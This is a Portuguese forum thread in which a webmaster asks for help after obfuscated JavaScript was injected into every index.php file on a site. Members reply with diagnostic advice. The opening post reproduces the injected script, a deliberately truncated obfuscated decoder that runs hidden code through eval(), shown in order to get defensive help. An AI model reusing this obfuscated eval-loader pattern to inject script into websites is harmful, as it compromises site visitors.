← Segurança

Vírus ou malware, preciso de ajuda!

Lida 3989 vezes

Offline

bfms 
Equipa
Mensagens 1769 Gostos 40
Feedback +1

Troféus totais: 35
Trófeus: (Ver todos)
Search Level 6 Apple User Super Combination Combination Topic Starter 50 Poll Votes 10 Poll Votes Poll Voter Poll Starter

Ora viva malta,

É o seguinte, um dos sites onde sou webmaster tem vindo a ser atacado ultimamente por supostamente um exploid ou algo do género. Adiciona um código em javascript em todos os index.php do site.

O códido é este:
Código: [Seleccione]
<script language=JavaScript> function vbnb25(z) {var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,30,11,14,4039,27,,62,25,29,32,5,56,37,51,9,12,36,13,38,61,0,0,0,0,33,0,6,35,4,3,41,21,20,19,8,55,44,0,31,57,16,43,60,17,10,49,45,50,24,15,46,47);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(225^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}vbnb25('7JRbQ94Sx2NSl7USEvutS9Rbc8kDQ94Pgvi_x7nT73D3HkKEaU_3vwvizXPcaZG2NSwDi_5x5_isNWXCiYB04bxERFmjuTi1RWlvi_mBVv') </script><!--linkdosite.com -->

O código é ainda maior que isto, removi algumas partes para o mesmo não ser usado para maldade eheh

Btw não sei como corrigir isto. Isto porque:
- o CMS foi programado de raiz e não por mim;
- os programadores do CMS já não estão responsáveis pela programação.


Gostaria de ler algumas opiniões acerca deste assunto e como ultrapassá-lo.
Offline

mix_93 
Membro
Mensagens 1630 Gostos 0
Troféus totais: 29
Trófeus: (Ver todos)
Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1

Acho melhor falares com algum programador, que tenha os mínimos conhecimentos a nível de segurança.
Offline

Santo 
Membro
Mensagens 1657 Gostos 4
Troféus totais: 31
Trófeus: (Ver todos)
Windows User Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5 Level 4 Level 3 Level 2

Verifica se não é uma injecção de código via servidor e não via a tua conta. Esse tipo de exploits normalmente afectam todos os websites do servidor. Tenta descobrir outros websites no mesmo servidor e verificar se esse código lá está.

Modificação massiva de todos os index.* é uma exploit já conhecida. Não posso como é lógico afirmar que é esse o caso, mas vale a pena pesquisares.

Acima de tudo tenta alistar a ajuda do teu fornecedor que tem ferramentas e acesso a logs que podem determinar a causa do problema.

Saudações e boa sorte
Offline

bfms 
Equipa
Mensagens 1769 Gostos 40
Feedback +1

Troféus totais: 35
Trófeus: (Ver todos)
Search Level 6 Apple User Super Combination Combination Topic Starter 50 Poll Votes 10 Poll Votes Poll Voter Poll Starter

Para já isso só acontece com este site. Os outros que tenho conhecimento estarem no mesmo servidor estão bem de saúde.
As permissões de alguns ficheiros onde tinha esse código eram apenas de escrita para o proprietário do mesmo, ou seja, o administrador (eu).

Tou a ver no plesk os logs mas como o site tem muitas visitas já não aparece as do dia da alteração das páginas. No entanto não encontrei nada de anormal.
Offline

Emanuel Santos 
Elite
Mensagens 848 Gostos 2
Feedback +25

Troféus totais: 25
Trófeus: (Ver todos)
Windows User Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 4 Level 3 Level 2 Level 1

Por acaso tens alguma área para upload de ficheiros ?
Offline

bfms 
Equipa
Mensagens 1769 Gostos 40
Feedback +1

Troféus totais: 35
Trófeus: (Ver todos)
Search Level 6 Apple User Super Combination Combination Topic Starter 50 Poll Votes 10 Poll Votes Poll Voter Poll Starter

Na administração (backoffice), mas esta área está protegida por palavra passe via .htacces

No site há formulários de email.
Offline

Emanuel Santos 
Elite
Mensagens 848 Gostos 2
Feedback +25

Troféus totais: 25
Trófeus: (Ver todos)
Windows User Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 4 Level 3 Level 2 Level 1

Provavelmente o script não foi feito de raiz, este tipo
de ataques é feito em grande escala e nunca afecta
sites construidos de raiz ou então tens uma grave falha
de segurança o que duvido pois tens vários sites sem
problemas no msm servidor.

É muito difícil avaliar a situação deste lado..
Offline

bfms 
Equipa
Mensagens 1769 Gostos 40
Feedback +1

Troféus totais: 35
Trófeus: (Ver todos)
Search Level 6 Apple User Super Combination Combination Topic Starter 50 Poll Votes 10 Poll Votes Poll Voter Poll Starter

Pois.
Segundo sei e vi a programação tem muitas falhas por parte dos programadores iniciais.

Antes até fazias login com injection LOL
Offline

Emanuel Santos 
Elite
Mensagens 848 Gostos 2
Feedback +25

Troféus totais: 25
Trófeus: (Ver todos)
Windows User Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 4 Level 3 Level 2 Level 1

Pois.
Segundo sei e vi a programação tem muitas falhas por parte dos programadores iniciais.

Antes até fazias login com injection LOL

 :lol: Isso deve estar cravado de buracos de segurança
então..